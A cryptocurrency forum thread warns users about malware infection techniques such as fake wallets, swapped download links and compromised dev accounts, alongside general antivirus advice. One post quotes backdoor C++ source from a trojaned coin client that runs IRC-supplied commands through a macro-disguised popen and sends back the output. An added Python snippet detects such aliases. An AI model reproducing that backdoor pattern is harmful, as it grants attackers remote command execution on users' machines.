innoxious06
Newbie
Offline
Activity: 2
Merit: 0
|
|
January 18, 2018, 03:44:48 AM |
|
Has anyone here tried Cisco AMP?
|
|
|
|
paulus51
|
|
January 18, 2018, 06:57:41 PM |
|
Tell me, is it so that Mac OS is not protected from such attempts to harm? It seemed to me that Apple's products are quite protected.
|
|
|
|
3zy
Newbie
Offline
Activity: 16
Merit: 0
|
|
January 18, 2018, 07:14:00 PM |
|
Recently I was a victim of this.
|
|
|
|
v.stekelenburg
Newbie
Offline
Activity: 16
Merit: 0
|
|
January 18, 2018, 09:58:35 PM |
|
The malware and cryptoware threat is absolutely there. The first thing you should do is regularly make a backup of your files. Besides that, I recommend Malwarebytes or Heimdal Security Pro software together with your antivirus program. Those two will actively ... uhh, how do you say it in English? Scan or real-time check your status. When you are the unlucky one whose Dropbox is encrypted by cryptoware, Dropbox can put back a backup up to 30 days, I believe. Don't wait too long to contact them.
For passwords, use a password safe like Enpass or 1Password. Copy-pasting your password is safer than typing it out. You can also use a virtual keyboard for that or for your credit card codes. A keylogger will see only the 'clicks' then ☺︎
|
|
|
|
HERMESH KAUR
Newbie
Offline
Activity: 130
Merit: 0
|
|
January 19, 2018, 04:02:02 AM |
|
Some steps must be taken which are good enough to protect your systems from being hacked, such as not using unknown exe files and using Linux, which seems to be less vulnerable to viruses.
|
|
|
|
rapi
Member
Offline
Activity: 336
Merit: 10
|
|
January 19, 2018, 09:05:09 AM |
|
I am happy to have made this decision. It will greatly improve my performance
|
|
|
|
neuran
Copper Member
Newbie
Offline
Activity: 288
Merit: 0
GYM Rewards, Mine with Your Body!
|
|
January 20, 2018, 03:13:53 PM |
|
Why can't we just get along
|
|
|
|
RieraMusic
Jr. Member
Offline
Activity: 336
Merit: 1
|
|
January 20, 2018, 06:06:09 PM |
|
I need my hardwallet now, too many risks in this crypto world, many scammers out there lol
|
|
|
|
Dharn
Newbie
Offline
Activity: 2
Merit: 0
|
|
January 20, 2018, 10:24:02 PM |
|
This is very helpful. I am very carefree while on the net, but with this information I will be more cautious.
|
|
|
|
mworld12
Newbie
Offline
Activity: 42
Merit: 0
|
|
January 20, 2018, 11:17:23 PM |
|
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.

Here is the relevant source code:

    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf)
        {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            CFree(buf);
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
        }
    }

Here is the source code with macros resolved:

    if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf)
        {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            pclose(buf);
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
        }
    }

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

good to know thank you
|
|
|
|
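A review-side check for the trick in the quoted post, where `CRead` hid `popen` behind a macro (added example, not code from the thread or from the coin's repository): it resolves simple `#define` aliases, including chains, and reports call sites that end at a process-spawning function. The `#define` lines in the sample and the names `spawn_aliases` and `find_hidden_spawns` are assumptions; the post only shows the resolved listing.

```python
import re

# Functions that start a process or run a shell command.
SPAWN_FUNCS = {"popen", "_popen", "system", "execl", "execlp", "execv",
               "execvp", "CreateProcessA", "CreateProcessW", "WinExec"}
DEFINE_RE = re.compile(r"^\s*#\s*define\s+(\w+)\s+(\w+)\s*$")
CALL_RE = re.compile(r"\b(\w+)\s*\(")

def spawn_aliases(source):
    """Map each object-like macro that resolves to a spawn function."""
    matches = map(DEFINE_RE.match, source.splitlines())
    defines = dict(m.groups() for m in matches if m)
    aliases = {}
    for name in defines:
        target, seen = name, set()
        # Follow chains such as A -> B -> popen, stopping on cycles.
        while target in defines and target not in seen:
            seen.add(target)
            target = defines[target]
        if target in SPAWN_FUNCS:
            aliases[name] = target
    return aliases

def find_hidden_spawns(source):
    """Return (line_no, name_as_written, real_function) per call site."""
    aliases = spawn_aliases(source)
    hits = []
    for no, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # preprocessor lines are not call sites
        for m in CALL_RE.finditer(line):
            real = aliases.get(m.group(1), m.group(1))
            if real in SPAWN_FUNCS:
                hits.append((no, m.group(1), real))
    return hits

# Constructed sample: call site abridged from the post; the #define lines
# are an assumption reconstructed from its "macros resolved" listing.
SAMPLE = '''#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose
if (vWords[1] == CBuff && vWords[3] == ":!") {
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) CFree(buf);
}
'''
if __name__ == "__main__":
    for no, name, real in find_hidden_spawns(SAMPLE):
        print(f"line {no}: {name}() resolves to {real}()")
```

A hit is a prompt for manual review, not proof of a backdoor; function-like macros, typedefs and function pointers are outside what this check resolves.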
bramgg.crypto
Member
Offline
Activity: 194
Merit: 10
Grow with the flow.
|
|
January 22, 2018, 01:12:23 PM |
|
Thank you for this post. I'm kind of a security geek but reading about these attempts to steal crypto stash made me even more aware of the dangers of not researching something and just going ahead and installing random stuff.
|
|
|
|
spanolesbaluko
Newbie
Offline
Activity: 43
Merit: 0
|
|
January 23, 2018, 04:09:56 PM |
|
Hello Crypto Investors.
Whenever convenient, provide me with more info on the following ICOs:
1. LiveEdu 2. RestartEnergy 3. Giftz 4. ATF 5. Cointed 6. RedChain 7. Titanium
|
|
|
|
galwaygolfer
Newbie
Offline
Activity: 3
Merit: 0
|
|
January 23, 2018, 04:49:12 PM |
|
What's everyone's view of best virus protection against malware? I switched to Bitdefender several months ago and it had blocked several sites. The only downside I have come across is the blocking of some of the wallet files. It can be a bit fiddly in adding them to trust.
|
|
|
|
agadinata
Newbie
Offline
Activity: 1
Merit: 0
|
|
January 23, 2018, 08:56:19 PM |
|
I have the same problem. In my task manager I got "winconhost". Is that the malware or not?
|
|
|
|
mega_carnation
|
|
January 24, 2018, 03:35:41 AM |
|
What's everyone's view of best virus protection against malware?
Paid or free? For a paid one I'll stick with ESET, I had it on my laptop, but for a free one, if you are using Windows 10, Windows Defender (a built-in antivirus) is enough.
I switched to Bitdefender several months ago and it had blocked several sites. The only downside I have come across is the blocking of some of the wallet files. It can be a bit fiddly in adding them to trust.
If Bitdefender is doing that to wallet files, that's risky if you had your coins out there; try Malwarebytes.
|
|
|
|
3zy
Newbie
Offline
Activity: 16
Merit: 0
|
|
January 24, 2018, 04:14:34 AM |
|
I got mine today via Speedcoin but wasn't able to get a screenshot; deleted it right away.
|
|
|
|
hodlcoinfan
Newbie
Offline
Activity: 12
Merit: 0
|
|
January 24, 2018, 04:36:49 AM |
|
Thanks for the heads up!
|
|
|
|
Still_Alone
Newbie
Offline
Activity: 182
Merit: 0
|
|
January 24, 2018, 05:34:25 AM |
|
Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
Very useful information for me. So we should be more careful and aware of the increasingly sophisticated malware infections today.
|
|
|
|
Raul Lopez
|
|
January 24, 2018, 08:16:08 AM |
|
Are there still malware infection attempts? Thank you!!
|
|
|
|
blockchainlion.com
Newbie
Offline
Activity: 7
Merit: 0
|
|
January 24, 2018, 05:03:45 PM |
|
Are there still malware infection attempts? Thank you!!
Yes, of course!!! Always be careful about files that you download from the internet AND links that you find on the internet. Files because of course a malicious file can execute code that creates a backdoor access for attackers or compromises your system. Links because when you click a link you send a request to a certain server. The server knows your IP address and can start scanning it to find open ports and vulnerabilities, which can ultimately be used to run exploits against you and compromise you in many ways. Also, links can simply be phishing attempts, which means you go to a login webpage that looks familiar and put in your credentials. These credentials are immediately stolen because the page is crafted by an attacker.
|
|
|
|
|